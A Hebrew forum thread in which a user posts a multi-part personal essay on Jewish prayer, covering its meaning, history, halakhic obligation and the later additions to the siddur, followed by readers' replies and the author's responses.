בית פורומים עצור כאן חושבים

תפילה על רגל אחת

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-2/10/2015 03:44 לינק ישיר 
תפילה על רגל אחת

יש הרבה מאד מה לכתוב על תפילה. מן הראוי היה לחבר אודותיה ספר. כפי שיתברר, אפשר לומר כי על התפילה עומד העולם, כלומר עולמו של האדם.

אבל חיבור בגודל ספר נבצר ממני לכתוב. ולמען האמת, אם אכתוב, מי ירצה לקרוא? אנו רוצים ללמוד ולהבין אבל מהר, בקיצור. שיהיה מעניין, קריא, וניתן להבנה על רגל אחת.

אז זה מה שאני מנסה לעשות. (זה גם מה שהבטחתי להשתדל לעשות השנה בחול המועד סוכות. קיימתי! תודה לאלוקים!).

דווח על תוכן פוגעני

נשלח ב-2/10/2015 03:45 לינק ישיר 

השאלות הגדולות של התפילה

נפתח בריכוז הנושאים שיש לעסוק בהם.

מהי תפילה? האם תפילה היא יחס ראשוני בין האדם לאלוקיו, או הונאה עצמית, או לכל היותר אשליה שאלוקים של הפילוסופים המיימוניסטים מתיר כשקר הכרחי לבני תמותה?

מה היא ההיסטוריה של התפילה, בין בקרב בני אדם בכלל (שאלה של מדעי הדתות והאנתרופולוגיה) ומהי ההיסטוריה של התפילה במקרא ומשם במסורת עד חז"ל – ועד היום הזה?

מהי תפילה לפי ההלכה?

מהי תפילה לפי הסידור?

וכמה חלוקות בסיסיות: תפילת היחיד מול תפילת הציבור, תפילת החובה מול תפילת הרשות.

ובסופו של דבר כמה שאלות שכל אחד כמעט שואל את עצמו:

האם אני חייב להתפלל? מה אני עושה כשאין לי חשק? או כשיש לי עיכובים אמיתיים (צער גדול, הסח הדעת, בעיה שאי אפשר להתרכז אפילו בשלוש ברכות ראשונות).

כמובטח אנסה לענות בקיצור. קיצור שלא יהיה בו משום אי דיוק (כמובן אני כותב את מה שאני מבין ויודע או חושב שאני מבין ויודע... תמיד יש דעות אחרות).

דדווח על תוכן פוגעני

נשלח ב-2/10/2015 03:48 לינק ישיר 

מהי תפילה?

מהי תפילה? אז ככה. לדעתי, ולדעת הגרי"ד סולוביצ'יק, ואולי לדעת הוגים נוספים, יהודים ולא יהודים, וכן לפי מה שרבים מאיתנו מכירים מנסיונם, תפילה היא דיאלוג. שיחה ביני לבין ה'.

מה שכתבתי הוא גם דיווח פנומנולוגי, כלומר שזה מה שאני מכיר וחווה. וזה גם אופן השימוש שלי במילה. יש לכם חויה דתית? מכירים את הרצון לדבר עם אותו מישהו שברא אותי, שמשגיח אלי, שמקשיב לי, גם אם הוא עונה לי בשלילה, אבל הוא תמיד מקשיב ותמיד עונה? זוהי תפילה.

יש גם דעות אחרות. יש שיגידו שזו טעות, שאפשר להסביר את התופעה הזו שכביכול משקפת את החויה העמוקה ביותר בחיי בתור אירוע מוחי כלשהו, או הונאה עצמית, או טעות פילוסופית. האם לא כך סבר רבנו הרמב"ם (זה שאני מעז לספח לעצמי את כינויו "מיימוני" תוך שאני חולק על הפילוסופיה שלו בדבר זה)?

ובכן, אני סומך מספיק על החויה הראשונית הזו שלי כדי לבנות עליה את עולמי ואת חיי, את ערכי ואת מחוייבותי ותקוותי. אני סומך עליה מספיק כדי לכתוב זאת כאן משום שאני מאמין שהדברים יהדהדו בלב אחרים, כפי שהדברים שקראתי אצל הרב סולוביצ'יק הדהדו אצלי ועברו מטמורפוזה עד שהם חוזרים ומופיעים כאן בהתאם להבנתי.

דבר אחד אני מבקש מכם: אל תתביישו להאמין, אל תתביישו להתפלל. זה נראה תמים, אולי ילדותי (למרות שזה לא). לפעמים אני חושד בעצמי שאני מרמה את עצמי. אבל גם אם אני מתעקש לחשוד בתפילה שהיא הונאה, האם אז איני מרמה את עצמי? מתוך פחד להאמין? מתוך פחד לטעות? מתוך אמון לא מוצדק (יש כזה דבר) במחקר ובפילוסופיה רציונליסטית או אחרת על פני חוויתי האישית והפילוסופיה הקיומית שלי?

האם אני יותר אמיתי בשעה שאני כן מתפלל או דווקא מסתייג מלהתפלל? ומה יותר אותנטי?

אולי צריך לקפוץ ולהעז להתפלל. לפעמים זה ודאי כך.

דדווח על תוכן פוגעני

נשלח ב-2/10/2015 03:49 לינק ישיר 

האנתרופולוגיה והפילוסופיה (כולל הקיומית) של התפילה

מאימתי קיים אדם? מאימתי קיימת תרבות? איך אנו מכירים אותה? יש צורות שונות שבהן תפס האדם את אלוקיו בהיסטוריה ובפרה-היסטוריה שלו, וחלק מהן מתועד במסורות שונות, בכתב, בפולקלור, אולי אפילו בציורי קיר ועל גבי מצבות.

לצערי אין לי מידע ממשי על התפילה בעולם העתיק. אולם אני מרשה לעצמי להביע השערה. אם האדם הוא אותו יש מתפלל, יהיה זה סביר לגלות את האדם, בתרבויות מוקדמות ככל שיהיו, עומד בקשר עם אלקיו.

כמובן, עקב טעויות קוגניטיביות האדם נטה לברוא לו אלוהימים רבים, אבל אולי אפשר להמשיל על כך את האמירה "עובדים זולתך וכוונתם אליך".

ומכאן לסוגי התפילות. אמנם נכון הוא שתפילה מתקיימת בכמה רמות.

בקשה וזעקה לעזרה. ראו את תפילת נביאי השקר לבעל בניסוי המפורסם של אליהו בהר הכרמל. הם נזקקו לנס ופנו אליו שיספק אותו. האם אין תפילות כאלו, שהן טכסים טכניים לגיוס עזרה אלילית, בסיפורי המיתולוגיה היוונית? יש אפילו מקבילות, להבדיל ולהבדיל, במזמורי תהלים, שם המשורר קורא לעזרת אלוקיו ומשתמש בביטויים דומים לאלו של נביאי הבעל, אלא שהוא פונה לאלקים חיים!

תפילת התודה. אני מקוה שהקורא את השורות האלו מכיר את התפילה היוצאת מן הלב כאשר אדם מרגיש שה' גמל איתו חסד. שהעולם פתאום יפה יותר, שהוא מרגיש שאלוקים סמך עליו ונתן לו מתנה גדולה, לפעמים חיים, לפעמים שידוך, לפעמים משפחה ובית, ועוד ועוד.

לפעמים זו תפילת היצור אל יוצרו. יתכן שזה מתאים לתפיסתו של הפילוסוף (הגוי) שליירמכר, שהגדיר את הדת כמבוססת על רגש התלות. זו התפילה שנשארת לאדם בשעה שהוא נשאר בחושך לבד, או בשעה שהוא שוכב על ערש דוי ואינו מסוגל אפילו לדבר שלא לומר לזוז, או כך לפחות אני מדמיין זאת. זו גם התפילה שבוקעת מן הלב כאשר אדם מגלה את עצמו כסופי מול האינסופי, אבל לא במובן של רודולף אוטו של פחד גם אם פחד במובן הנשגב של החויה הנומינוזית (חויה ייחודית של היצור מול האינסוף היוצר) אלא במובן יותר סולוביצ'יקי, ואולי רוזנצויגי, שיש מי שאוהב אותי, והוא האלוקים.

ולפעמים זו כמובן תפילה שדווקא כן יוצאת מן החויה נוסח אוטו, אבל איני אוהב אותה וכנראה איני מכיר אותה אז אני יכול רק לכתוב עליה בכמה מילים.

ויש את התפילה המתבוננת, שאינה אלא חויה פילוסופית, ואני משער שזה מה שהיה לרמב"ם לפי רמזיו נגד התפילה הדיאלוגית מול מי שמקשיב, רמז החבוי בצורה לא נסתרת במיוחד במורה נבוכים.

דדווח על תוכן פוגעני

נשלח ב-2/10/2015 03:49 לינק ישיר 

התפילה בתנ"ך

אלו תפילות אנו מכירים בתנ"ך? אוהו!

לצערי אין לי תשובה מוכנה, אבל אנסה. בוודאי יהיה מה להשלים.

ראשית יש את תפילת הצעקה, הקריאה לעזרה, שאכן מופיעה בלשון של "ויצעק אל ה' ". וסביר שתפילה זו הושמעה בקול גדול. יתכן שבני אדם היו, סליחה על החשד, פרימיטיביים להזדקק לתפילה בקול גדול ולא השתמשו בתפילת הלב כמקובל אצלנו.

יש את תפילת התודה, שדוגמאות לה נמצא בתהלים.

ויש תפילה חרישית, כזו שמצאנו אצל חנה אם שמואל, לפני שהפכה לאמו של שמואל, כאשר התחננה להפוך לאמו של שמואל, של בן שתקדיש לה'. היה ראוי להעתיק את התפילה ולנתח אותה, כפי שעשו באמת חז"ל וציינו שלמדו ממנה הלכות גדולות. זו תפילה שכוללת שבח ותחינה והודאה על העתיד.

ויש גם את התפילה המתבוננת, אם כי לא ממש התפילה הפילוסופית, של בחינת "כי אראה שמיך מעשה אצבעותיך" שבה האדם מכיר בחולשתו ובסופיותו ומנגד בכך שה' בחר בו. בנו!

דדווח על תוכן פוגעני

נשלח ב-2/10/2015 03:50 לינק ישיר 

התפילה בהלכה

האם יש מצות תפילה? כמה פעמים ביום, אם בכלל? עד כמה שאני זוכר, דעת הרמב"ם היא שיש חובת תפילה מן התורה פעם ביום. אחרים מקילים יותר שחובה זו אינה אלא בשעת הצורך, ולפי זה התפילה שהם חושבים עליה היא תפילת הקריאה לעזרה.

חז"ל הפכו את התפילה הזו למה שנקרא אצלנו "תפילת 18". וחייבו אותה פעמיים ויש אומרים שלוש פעמים ביום.

מדוע חז"ל חייבו יותר תפילות ומדוע קבעו נוסח מסויים? אכתוב את השערותי, שכמובן אינן רק שלי. התפילות שחז"ל ייסדו קיבלו תאוצה לאחר חורבן המקדש, כיון שהעם חש שניתק הקשר בינו לבין אלקים ובמה תתבטא הבחירה שבחר בנו מכל העמים אם הרס את מקדשו ולא חמל? הניסוח נועד לא רק עבור כבדי הלשון כדברי הרמב"ם אלא בכלל, כיון שיש אמונה בסיסית, שהיא אמונה שגויה, שצריך יכולת ניסוח כדי להתפלל. ולא היא. ה' שומע את זעקת הלב. מבטיח לכם. מהנסיון.

אז חז"ל סיפקו לנו נוסח שעוזר לנו וסידרו את הבקשות וההודאות הנחוצות. אבל למעט שלוש ראשונות (לצערי איני יכול לתאר כאן את מבנה התפילה אבל גשו ובדקו בסידור) ושלוש אחרונות, שאר הברכות הן רק פתיחה וסיום, ובאמצע יכול כל אחד מאיתנו להוסיף כרצונו. וכבר אמרו שהרוצה להאריך יאריך כמשה והרוצה לקצר כנ"ל. לפי המדרש משה התפלל מאות תפילות רק כדי לבטל את הגזירה ולהיכנס לארץ (ונדחה, ה' שומע אבל יכול לסרב). וכן קיצר מאד על אחותו, "א-ל נא רפא נא לה". ושתי אבחנות אלו מופיעות כמובן בגמרא.

זו בעצם חובת תפילה מדאורייתא ודרבנן. איך הגענו למה שכתוב בסידור? טוב, פרק חדש!

דדווח על תוכן פוגעני

נשלח ב-2/10/2015 03:52 לינק ישיר 

היסטוריה של תוספות

הדברים הבאים מופיעים בכל ספר שמסכם את תולדות התפילה, למשל במחקרו הישן והטוב של אלבוגן (פרופסור ורב רפורמי, אבל כמדומה שספרו על תולדות התפילה הוא המקיף מכולם).

ראינו כיצד התפילה מן התורה לבשה את הניסוח הפורמלי למחצה של "18" שלנו, עם התאמות לחגים וכיו"ב.

כמו כן קבעו חז"ל חובה לקרוא קריאת שמע (הפרשיות המסויימות מן התורה) וקבעו לפניהן ולאחריהן ברכות, בערב יותר מאשר בבוקר.

(וחז"ל קבעו גם את ברכות השחר, שמתחילות ברגע שאדם פוקח עינים ומתעורר, אבל לפני כמה מאות שנים החליף מישהו מפורסם את הודאת "אלקי נשמה שנתת בי טהורה היא וגו' " ב"מודה אני לפניך" מפני שחש שלא מתאים לומר את שם השם גם אם הוא ישן בפיז'מה. וכן נהגו לצערי).

ולפני התפילה נהגו להתכונן. אז התחילו לומר קצת מזמורי תהלים (מסוף הספר אבל לא היה להם מנין וקיבוע) ואז הוסיפו לפני ואחרי ברכה פותחת וסוגרת ("ברוך שאמר" ו"ישתבח").

אה, וחז"ל השאירו מקום לתפילה פרטית בתור "תחנון" כדי שאדם ימצא מקום לבקשותיו האישיות. אבל כאן הפריע אותו צורך שהניע את חכמינו לנסח את תפילת "18". תחנון? תנו לנו ניסוח קבוע, בבקשה! לא יתכן שאתפלל כך סתם מהלב...

וזה ממש הכל.

חז"ל גם תיקנו לחזור על תפילת עמידה, החזן עבור הציבור, אבל הרמב"ם הלך וביטל את החובה הזו מפני שלא הקשיבו ממילא. וכן, מי אינו יודע להתפלל אם יש לו סידור (בקהילות בחו"ל שבהן אין יודעים עברית, או אצל בעלי תשובה וכאלו, יתכן שיש טעם וצורך בחזרה).

יש מרחק גדול בין מה שתארתי בתור התפילה המחוייבת מדברי חכמים לבין מה שאתם מכירים מבית הכנסת. כולן, החל מן התפילה שלפני התפילה ועד לתפילה שאחרי התפילה, כולן מאוחרות, אולי הן תלויות במנהג ואולי גם זה לא.

והתוספות לתפילה הולכות ומתרבות עד היום הזה. יש תוספות מימי הגאונים או קודם כגון "קדושה דסידרא". יש קטע ארוך על תשבחות המלאכים שנדחף לתוך ברכה ראשונה לפני קריאת שמע והוא דומה מאד לתפילות ותשבחות כת קומראן... יש קדישים. יש ויש ויש, עד "עלינו לשבח" שכל יהודי אומר בתור הדבר האחרון לפני שאפשר ללכת הביתה מבית הכנסת...

אז יש סידור. והציפיה של אדם ירא שמים בלי ידע בתולדות התפילה וניתוח חובותיה כפי שכתבתי כאן, אדם כזה תמים וטוב, ירצה לומר את כולו, כל מה שיש בסידור - רק שזה המון המון. אבל זה לא עוד יותר טוב?

או שלא.

ידיעה היא תהליך בלתי הפיך. ויש לו מחיר, גם בייסורי נפש. אין דומה מי שניגש לסידור בתמימות שלוותה אותו מאז למד לקרוא ב"מכינה" (או, נניח, כבעל תשובה בצעדים ראשונים בבית הכנסת) למי שניגש לסידור עם ידע הלכתי והיסטורי, או עם ידע פילוסופי...

דדווח על תוכן פוגעני

נשלח ב-2/10/2015 03:52 לינק ישיר 

תפילת היחיד ותפילת הציבור

בית הכנסת נזכר במשניות שונות הרבה לפני החורבן. מה שלא כתוב במשניות הוא מה נעשה בו. האם היה זה מין בית עם לכינוסים, או לדרשות, או מקום תפילה כמו אצלנו היום? מחלוקת החוקרים...

לתפילת הציבור יש קבע. זמן קבוע, נוסח קבוע, מקום קבוע. אבל ניתן לטעון שבית הכנסת נועד לצרכים חברתיים ותרבותיים, והתפילה היתה מניע חזק שמשך ומושך יהודים אל בית הכנסת. מה ששומר עליהם בקהילה ומעניק להם הטבות מתבקשות. (אפשר לקבל גמ"חים, יש מי שיבוא לשמוח בחתונות ולהשתתף בצער וגו' וגו' ).

אכן לפעמים התפילה בבית הכנסת פותחת את הלב. מי לא חש את יום כיפור מתחיל בשעה שהש"ץ מתחיל "כל נדרי" ומי אינו רוצה לבכות כשמתירים להתפלל עם העבריינים (הנה, גם לי מותר עכשו להיות עם כולם). מעטים מאד מכירים את ההיסטוריה של ההיתר הזה. אבל מה זה משנה. הניגון והחויה המתחדשת עיקר.

וכן ההרגל עושה את שלו גם לטובה. חז"ל אמרו שאדם צריך לקבוע לו מקום כפי שייחסו לאברהם אבינו. ואכן, כאשר אני עמל להשתדל ולחשוב על המילים בתפילה ועושה זאת, לא תמיד בקלות, פעם אחר פעם, באותו מקום מסויים, אני קונה הרגל טוב שעוזר לי בזמנים קשים.

ויש מנינים טובים, מנינים ישיבתיים רציניים, ואולי גם חסידיים כאלו. ובעצם היכן לא. מנין טוב מושך אותי אחריו ועוזר לי להתרכז, מה שנקרא גם "לכוון".

אבל בית הכנסת מהווה גם מטרד. אני צריך להתאים את עצמי לסדר ולזמני החזן והציבור. גרוע מכך, אני חייב להופיע כדי שלא ישאלו למה איני מגיע. ואני חייב להגיע בהתחלה ולצאת בסוף כדי לא לקנות לעצמי שם רע ובקהילות חרדיות, כמו בני ברק, לפגוע ב"שידוכים"...

דדווח על תוכן פוגעני

נשלח ב-2/10/2015 03:53 לינק ישיר 

מסקנות מעשיות: יחיד מול רבים

אחרי שהצגתי את תפיסתה של התפילה כמה שהעולם עומד עליו, מה שמאפשר לי קשר ייחודי עם ה', עלי להודות שרק לפעמים אני זוכה לתפילה כזו. פעמים רבות אין לי חשק להתפלל. וזה יכול לנבוע מסיבות שונות. אבל זה כך.

ובמיוחד כאשר הסידור הארוך הארוך ממתין לי, ובית הכנסת עם מנהגיו ותוספותיו מצפה שאתנהג כמו כולם.

אדגיש כי הבעיה של הסידור הארוך אינה רק למישהו ביקורתי כמוני, שמבחין בין תוספות לסידור מבחינה היסטורית ולכן הרוב אינו מחייב באמת (לפי תפיסת ההלכה שלי שצריך לבאר בהזדמנות אחרת). הבעיה היא גם שהוא באמת ארוך. האם אדם מסוגל להתפלל בהתלהבות את כל מה שמודפס בשחרית? כולל קרבנות? בלי להתעייף? יום אחרי יום? ולהשאיר כוח לשאר דברים, אפילו ללימוד תורה? כמה בני אדם מיוחדים שמסוגלים כאלו יש?

אם אמקד, נראה שהבעיה היא בשלוש רמות. הפער בין מה שהציבור עושים ולא מקובל עלי. (אני מתאר את עצמי כמובן). הפער בין מה שהסידור לכאורה מחייב אבל אני לא רוצה. והפער בין החובה להתפלל לבין הרגשתי בימים שונים ומשונים.

ואלו הם הפתרונות שאני מוצא:

אפשר להגיע לבית הכנסת ולא להתאמץ לדקלם עם כולם. כן צריך להשקיע בחלקים החשובים, שהזכרתי לעיל.

(ברכות השחר הן בבית. בבית כנסת זה כולל קריאת שמע וברכותיה אך ללא התוספות המאוחרות, וכן תפילת עמידה עם הניסוח האישי שלי, וכן תחנון קצר או ארוך במילים שלי אחר כך. אם רוצים אפשר לומר מזמור אחד או שנים עם ברכת ברוך שאמר ואחריהן ישתבח. ולדעתי – זהו זה).

אז מה עושים בשעה שהציבור מנסים לצאת ידי חובה לפי מנהגם? ובכן, בשביל מה יש ספרים? האם אין מה ללמוד בינתים? איני מתכוון לעלונים המציפים אותנו שחוששני שאפילו מיעוטם אינו יפה. מדוע לא לקבוע סדר לימוד מיוחד לזמן התפילה? אפשר לסיים ששה סדרי משנה (עם קהתי).

זה הפתרון לשתי הבעיות המטריחות את האדם אשר כמוני. לחילופין, אפשר גם להישאר ולהתפלל בבית או במקום פרטי או בלב היער או בכל צורה של התבודדות. מי אומר שחייבים מנין? בוודאי שלפעמים המנין מפריע. אם כי חשוב להגיע לתפילה במנין בשבת בבוקר ואולי גם בימים שני וחמישי. וכאמור, בלי בית כנסת אין קהילה!

דדווח על תוכן פוגעני

נשלח ב-2/10/2015 03:53 לינק ישיר 

מסקנות מעשיות: אני עם עצמי ואלוקי

אבל מה עושים כשאני עצמי איני רוצה להתפלל?

האם עלי להכריח את עצמי?

אז גם הנוסחאות האמיתיות של חז"ל, בלא התוספות, גם הן יותר מדי לפעמים.

מה עושים? או לא עושים?

אני יכול לחשוב על שתי תשובות, ושתיהן נכונות.

אליבא דאמת, לא חייבים. להפך, אולי אסור. לא רק שזו לא חובה. זה איסור! לומר את שם ה' סתם מתוך דקלום, עבירה!

אבל זו רמה גבוהה מאד של שמירת מצוות ומצות תפילה. איני רואה את עצמי בדרגה כזו (באמת). אני מעדיף להסתכן ולנסות להתפלל עם כוונת המילים והלב כל פעם ופעם גם כשקשה. סוף סוף, האם אני מצליח להתפלל בכוונת המילים את כל תפילת העמידה? אולי פעמים נדירות. אבל זה טוב מאד. זה מה שה' רוצה ממני.

וכן, אם אבדוק את עצמי אם אני מסוגל להתפלל כשאיני יכול, אני משער שכמעט לא אגיע להתפלל. ואז אני גם חושש שאמציא לעצמי תירוצים.

אבל מי שבאמת משתדל לכוון וקשה לו, יש שני פתרונות בינים.

האחד הוא להתפלל יותר בקצרה. כלומר ראש וסיום של אחת מן הברכות האמצעיות. "רפאנו ה' – ברוך אתה ה' רופא חולי עמו ישראל", "ברך עלינו את השנה הזאת – ברוך אתה ה' מברך השנים". זהו.

הפתרון השני נקרא "הביננו". זה ניסוח מתומצת ביותר, וכדאי להכירו ולהחזיק עותק שלו בסידור האישי. צריך כמובן לומר לפניו ולאחריו את הברכות הפותחות והמסיימות. וצריך להשקיע בלימוד ותשומת לב לכל מילה. יש מעט מאד כאלו!

לפיכך, בשעת הדחק, הרוצה להתפלל ינקה את גופו ויטול ידיו, יניח תפילין, יקרא קריאת שמע עם הברכות (בלי התוספות) ויתפלל תפילה קצרה בכוונת הלב והמילים. וזוהי קבלת עול מלכות שמים ומצות תפילה בשלימות (כותב שורות אלו על פי לשון הרמב"ם).

דדווח על תוכן פוגעני

נשלח ב-2/10/2015 03:54 לינק ישיר 

זהירות ותקוה

כתבתי מה שכתבתי מתוך חשש עצום. כמה עלולים לזלזל בתפילה בגלל מה שכתבתי? אבל כמה יכוונו יותר בתפילה? תיק"ו.

אז אני פונה לה' שלא אכשיל ולא אכשל, ואעזור למי שרוצה להתפלל ומתקשה. ממש כמוני.

ואני מחכה לבית הכנסת שיחזיר עטרה ליושנה ויתפללו בו רק את התפילה המחוייבת... מי שמכיר או פתח, נא לפרסם באשכול זה. תודה.

ויהיו נא אמרינו לרצון לפני אלוקינו.

דדווח על תוכן פוגעני

נשלח ב-2/10/2015 06:18 לינק ישיר 

תודה
לא התייחסת לעניין המניין

נשלח מהאנדרואיד שלי

דדווח על תוכן פוגעני

נשלח ב-2/10/2015 09:04 לינק ישיר 

מיימוני אז מדוע אינך מאמין בקבלה?

דדווח על תוכן פוגעני

נשלח ב-2/10/2015 12:00 לינק ישיר 

מיימוני, כל דבריך אמת וצדק, ומבוססים גם על מקורות חז"ל המיהמנים.

אמנם, הצבת פה 2 בעיות בתפילה כפי שהיא מוכרת כיום (וכינית אותה כדרישה של בתי הכנסת) בעיה אחת היא ה"תוספות" שהוסיפו לתפילה, ואף רצית לקבוע מזה הלכה למעשה.

עוד כתבת, שלעתים הינך (וכמוך מן הסתם רבבות אלפי ישראל) מרגיש שאינך רוצה להתפלל, ואף הוספת שלעתים אינך יודע אפי' למה הינך מרגיש זאת, אבל זוהי תחושה, שאין להתעלם ממנה. 

אז אני חושב, שהבעיה השניה היא זו שהביאה לבעיה הראשונה.

כלומר, בעצם, התפילה לפי התורה אמורה לקחת בדיוק 3 דק' גם אם נוסיף לה את קריאת שמע על ברכותיה.

ויש פה בעצם בעיה, כיון שתפילה כזו לא יכולה להגיע מעומק הלב, ניהול דיאלוג עם מי שברא אותך, צריך לבוא מתוך הבנה שחסר לך משהו שאותו בורא יכול להשלים לך אותו לו רק ירצה, פה מגיעה התפילה, (גם לפי שיטתך, הרי אי כוונתך שתפילה היא רק דו שיח כמו בין 2 חברים אע"פ שדו שיח כזה כן יכול להיחשב כתפילה, אבל לו רק זה היה ההגדרה של תפילה  לא היה צורך בה כנראה) ולכן, קשה להגיע לרוממות הלב, ולהבנה עמוקה ברגש בצורך שיש לי, ובגדלות הבורא שיכול לו רק ירצה למלאות צורך זה.

לכן, במרוצת הדורות תקנו (אין זה תקנה כשאר תקנות חז"ל אלא סתם מנהג טוב) שלפני שניגשים לדבר עם הבורא להלהיב את הלב בגדלות הבורא, בשליטתו בבריאה, ביופי הבריאה. זו הסיבה שנוספו את המזמורים הללו לפני התפילה. 

אמנם הצבת פה בעיה, שלעתים אדם שמשקיע מכוחו ומכוונתו לעורר את ליבו מתעייף כבר בשעה שהוא מגיע כבר לעצם התפילה עצמה.

ופה ההגיון אומר, תקרא מזמור אחד או שניים, ותתפלל ובזה אתה צודק, אבל דברים אלו כבר הוקבעו כמנהג, וצריך לבדוק מה ההלכה אומרת לגבי מקרה שכזה (אינני שולל שזה מה שצריך לעשות, רק שהנני מוסיף פה את נקודת המבט של "מנהג ישראל" שלעתים איננו מתחשב בהיגיון או בסברא ולכאורה צריך להוסיף את זה למערכת השיקולים)

עוד כתבת לגבי ברכות קריאת שמע, ורמזת על זה שגם בקוראן יש ביטוי לתפילת המלאכים, אז אולי הקוראן לקח את זה מהסידור היהודי?  כמו שלקח אינספור דברים מארון הספרים היהודי, אולי גם את זה.

בכל אופן, אינני יודע מי תיקן את הנוסח אבל אם מי שתקן אותו היו אנשי כנסת הגדולה, יתכן ושינוי והוספה על הנוסח הקיים יכול להיכנס לגדר של "משנה ממטבע שטבעו חכמים בברכות" שכידוע יש איסור לשנות ממטבע שטבעו חכמים.

שוב אינני יודע מה כן לעשות במקרה כזה, אבל אני רק רוצה להכניס את זה למערכת השיקולים.

דדווח על תוכן פוגעני

נשלח ב-2/10/2015 12:54 לינק ישיר 

תודה לכל המגיבים.

קרדיולוג (ברוך הבא אל הפורום! - אם טרם ברכתיך) וכולם

שאלת על "מנין". לא התייחסתי למנין באופן מסויים, כי כתבתי על בית הכנסת ועל תפילת הציבור. "ציבור" מינימלי זה מנין, כלומר עשרה גברים בני חיוב (החל מגיל בר מצוה, ואל ניכנס לסוגיה של חזקה דרבא). אולם כתבתי רק על שאלות מעשיות. לא דנתי בשאלה אם עדיף להתפלל בבית כנסת כאשר אין מנין או בשאלות פרטיות אחרות.

רק אכתוב את הנקודה הבאה: יש שאלות שמועלות כשאלות להלכה, פונים איתן לרב, מחפשים תשובה בספר. אבל התשובה לא מתחילה שם ואולי גם לא נמצאת שם. המטרה של התפילה היא לדבר עם ה'. חז"ל תיקנו כל מיני תקנות. אבל כאשר אין לנו תקנה ברורה, וכאשר יש שני צדדים לכאן ולכאן, הקו המנחה העיקרי הוא: מה יעזור לי לכוון בתפילה יותר.

עוד נקודה שלא הבלטתי. מה זו "כוונה"? יש שימושים רבים במילה הזו. אני משתמש בה לשתי מטרות בלבד, ומוציא את כל האחרות מכלל הדיון שלי. במיוחד הקבליות... יש כוונת המילים, לדעת מה אני אומר, בדיוק כפי שאני כותב כעת וחושב על המילים ואיני מוציא אותן סתם. להבדיל משיחות של מה בכך שבהן אני או כל אדם מסוגל להוציא מילים כדי לצאת ידי חובת השיחה או החברה. וזה מצוי יותר מדי בתפילה, כפי שכולנו מכירים, וכפי הסיפור היפהפה של אותו מגיד ירושלמי, שסיפר כיצד היה במסע התרמות בחו"ל, והלך ברחוב, ופתאום פגע בו איזה בריון וחבט בו בחזה, ואז התעורר וגילה שהוא נמצא ב"סלח לנו" וחובט באגרופו על ליבו. אולי זה היה בעשרת ימי תשובה...

מעבר למחשבה על המילים ופחות או יותר ידיעת פירושן (לא המילוני אלא איך משתמשים בהן), יש כוונה שאני יודע שאני עומד לפני ה'. זה כולל קודם כל ידיעה שיש כאן דיאלוג. שאני לא לבד. וכמובן קצת לדעת ולהבין מה זה ה'. זה כמובן מצריך ידע פילוסופי נרחב, אבל דומה שדי בידיעה הכללית שאני מתפלל ואני מתפלל לפני האלוקים שמצד אחד הוא בורא הכל (כי אראה שמיך מעשה אצבעותיך) ומצד שני הוא שבחר באדם הסופי והמוגבל (מה אדם כי תבחרנו). דומה לכך דיונו של ר' חיים מבריסק על הכוונות בתפילה שכותב כמדומה דברים דומים לאלו.

כוונה כזו קשה להשיג עד כמה שזה מפתיע ולכן כתבתי מה שכתבתי.

עומד בפרץ

(ברוך הבא אל הפורום! - אם טרם ברכתיך).

תודה על התגובה הארוכה. יש לי כמה דברים להשיב, ביניהם שלא הסברתי די הצורך.

א. תארת את התפילה כ-

ניהול דיאלוג עם מי שברא אותך, צריך לבוא מתוך הבנה שחסר לך משהו שאותו בורא יכול להשלים לך אותו לו רק ירצה, פה מגיעה התפילה, (גם לפי שיטתך...

ועוד כתבת:

ולכן, קשה להגיע לרוממות הלב, ולהבנה עמוקה ברגש בצורך שיש לי, ובגדלות הבורא שיכול לו רק ירצה למלאות צורך זה

התפילה שאתה מתאר היא תפילה למילוי בקשה והיא כנראה סניף של בקשת עזרה כפי שתארתי אותו. וזו רק אחת ממטרות התפילה. ולא החשובה שבהן. ראה לעיל במה שכתבתי.

2. עוד כתבת שמנהגים מחייבים ולכן הם דוחים מה שמועיל לתפילה בכוונה. אני חולק על היסוד הזה, שמנהגים מחייבים. וזאת לבד מהשאלה אם מנהג שלא מוכר יכול לחייב, או שבכלל מנהגים יחייבו כאשר הם גורמים להפסד (אדעתא דהכי תוקנו - על דעת כן תוקנו? אתמהה). צריך קונטרס כדי לבאר מדוע אין מנהגים  מחייבים, או ספר, אז אני נאלץ להסתפק באבחנה זו. אם אתה חי לפי מנהגים ומשעבד את הנהגת התפילה שלך למנהגים זו כבר דרכך שלך, אם כי אולי יש עוד שיגשו לנושא כמוך. גם עבורך ועבורם אני כותב, אבל אני משער שדברי לא יהיו רלוונטיים לך. הם נועדו למי שרוצה לבדוק ולשנות.

בקיצור: אני מקוה שעמדתי ברורה וקח מזה מה שמועיל וטוב לך. ויהיו כל מעשינו לשם שמים.

3. הערה קטנה. כתבתי שהקטע על המלאכים לקוח מכת קומראן. קומראן ולא קוראן. כת קומראן היתה בימי בית שני. לא ידוע בדיוק מי היו אנשיה (יש אומרים צדוקים, יש אומרים איסיים) אבל כן ידוע מן הכתבים שלהם שנמצאו במערות באיזור שעל שמו מכנים אותם היום, שהם האמינו במקהלה מלאכית ועסקו הרבה בתיאור המקהלה במה שהיה תפילתם.הם היו כת כלומר לא יהודים תקניים במובן שלנו. הדמיון העצום בין המקהלות המלאכיות שלהם למקבילות חלקיות במה שמכנים "ספרות ההיכלות והמרכבה" (כתבים מאוחרים יותר המיוחסים לתנאים כמו ר' ישמעאל ור' עקיבא ואחרים אבל הם זיוף ולא ידוע מי כתב ומתי) מהווה תעלומה היסטורית. האם הם לקחו מהיהדות החז"לית או הפוך? זה נושא מעניין ונדמה לי שהיו עליו אשכולות. אני מעדיף לדון בנושא באשכול אחר, ואני בטוח שאם אינך מכיר תתעניין. זה מרתק.

אולם קח בבקשה את המסקנות האלו מדברי:

א. התפילה אינה רק בקשת עזרה ממי שיכול. היא גם קשר של אהבה, התפעלות, אפילו חיבור מיסטי בעיני קצת הוגים.

ב. הלכות אינן אמורות להתנגש עם הצורך להתפלל. והתנגשות זו היא לא רק בעיה פסיכולוגית, או חינוכית, אלא הצדקה לדחית מה שנתפס כחיוב התפילה בבית כנסת ובסידור. ולכן הרשיתי לעצמי לכתוב מה שכתבתי. קודם כל נעזור לעצמנו להתפלל. ונתעלם ממה שמכביד וסביר שגם אסור לאמרו משום "אזכרת שם שמים לבטלה"

בעל בעמיו

אתה רציני? לקחת את האשכול הזה ולדון בו בקבלה?

כאילו אינך מכיר את דעותי ממקומות אחרים.

